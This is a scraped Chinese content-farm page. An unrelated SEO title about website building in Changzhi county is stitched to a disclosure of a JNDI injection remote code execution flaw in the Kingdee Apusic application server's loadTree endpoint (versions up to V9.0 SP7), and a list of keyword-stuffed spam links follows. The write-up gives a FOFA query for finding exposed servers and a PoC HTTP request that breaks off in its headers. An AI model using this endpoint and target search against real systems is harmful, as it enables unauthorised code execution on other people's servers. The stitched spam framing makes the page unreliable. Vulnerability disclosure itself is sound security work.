当前位置: 首页 > news >正文

长治县网站建设网络营销基础网站建设与运营

长治县网站建设,网络营销基础网站建设与运营,关键词自动生成器,成都网站建设方案托管0x01 产品简介 金蝶Apusic应用服务器是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。 0x02 漏洞概述 由于金蝶Apusic应用服务器权限验证不当,导致攻击者可以向loadTree接口执行JNDI注入,造成远程代码执行漏洞。利用该漏洞需低版本JDK。(漏洞比较旧,8月份…

0x01 产品简介

金蝶Apusic应用服务器是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。

0x02 漏洞概述

由于金蝶Apusic应用服务器权限验证不当,导致攻击者可以向loadTree接口执行JNDI注入,造成远程代码执行漏洞。利用该漏洞需低版本JDK。(漏洞比较旧,8月份补丁已出,金蝶EAS也存在类似漏洞,只是路径不一样)

0x03 影响范围

影响版本

金蝶Apusic应用服务器 <= V9.0 SP7

不受影响版本

金蝶Apusic应用服务器 > V9.0 SP7

0x04 复现环境

FOFA:app="Apusic应用服务器"

0x05 漏洞复现

PoC

POST /admin//protect/jndi/loadTree HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh
http://www.yayakq.cn/news/960202/

相关文章:

  • 飞鸽网站建设网站建设 保定
  • 网站开发层次设计公司起名网
  • 做公司的后台网站用什么软件好电子行业网站
  • 网站 改版 建议百度地图官网2022最新版下载
  • 馆陶做网站wordpress插件 手机版
  • 网站建设中模板wordpress是php吗
  • 长春做企业网站多少钱wordpress上传vps后安装
  • asp网站后台模板外贸网站建设公司信息
  • 大沥网站建设公司张云网站建设
  • 如何上传网站到云服务器长沙专业竞价优化首选
  • 做儿童方面的网站婚纱摄影网站设计论文
  • 一个网站完整详细的seo优化方案学校班级网站建设主页源代码PHP
  • 网站建设与网页设计案例教程12306网站开发费用
  • 湖南网站设计公司上海景朋建设工程有限公司网站
  • 门户网站推广介绍方案在线商城平台
  • 网站的交互性网站业务流程设计
  • 网站logoPS怎么做宁波建站服务
  • 用英文介绍购物网站沈阳专业网站建设
  • 如何借用别人网站做模板网站建设 讲话
  • 中南建设的网站wordpress单图模式
  • 做网站用php还是html好wordpress首页显示评论
  • 音乐APP网站开发软件培训内容
  • 通过平台建网站做旅游销售网站平台ppt
  • 自己做网站可行吗网站设计师工资一般多少
  • 青山湖南昌网站建设甘肃省环保建设申报网站
  • 网站建站智能系统宁波在线网
  • 网站seo谷歌企业年金是什么?缴费比例是多少?
  • 常州做网站软件大连建设网站的公司
  • 兰州市住房和建设局网站如何做流量网站
  • 服装电子商务网站建设与实现云主机推荐